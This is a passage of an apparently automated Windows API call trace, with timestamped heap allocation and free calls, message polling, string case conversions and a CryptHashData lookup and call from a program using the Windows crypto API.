lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0153.533] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0153.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0153.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0153.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0153.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0153.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0153.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0153.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0153.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0153.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.534] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0153.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0153.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0153.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0153.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0153.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0153.534] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0153.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0153.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0153.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0153.534] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0153.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0153.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0153.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0153.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0153.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0153.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0153.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0153.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0153.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0153.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0153.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0153.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0153.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0153.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0153.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0153.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0153.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0153.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0153.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0153.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0153.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0153.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0153.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0153.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0153.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0153.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0153.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0153.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0153.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0153.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0153.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0153.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0153.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0153.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0153.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0153.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0153.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0153.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0153.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0153.536] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0153.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0153.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0153.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0153.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0153.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0153.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0153.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0153.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0153.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0153.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0153.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0153.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0153.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0153.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0153.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0153.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0153.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0153.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0153.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50ba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0153.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0153.537] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0153.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0153.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0153.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0153.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0153.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0153.538] CryptHashData (hHash=0xa87050, pbData=0x2e54d58, dwDataLen=0x3, dwFlags=0x1) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0153.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0153.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0153.539] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0153.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0153.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0153.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0153.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0153.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0153.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0153.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0153.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0153.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0153.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0153.540] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0153.540] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0153.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0153.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0153.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0153.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0153.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0153.540] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0153.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0153.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0153.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bd8 [0153.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0153.540] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0153.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0153.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0153.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0153.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0153.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0153.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0153.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0153.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0153.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0153.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0153.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0153.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0153.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0153.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0153.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0153.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0153.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0153.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0153.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0153.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0153.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0153.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0153.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0153.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0153.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0153.541] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0153.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0153.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0153.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bd8 [0153.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0153.541] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0153.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0153.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0153.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0153.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0153.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 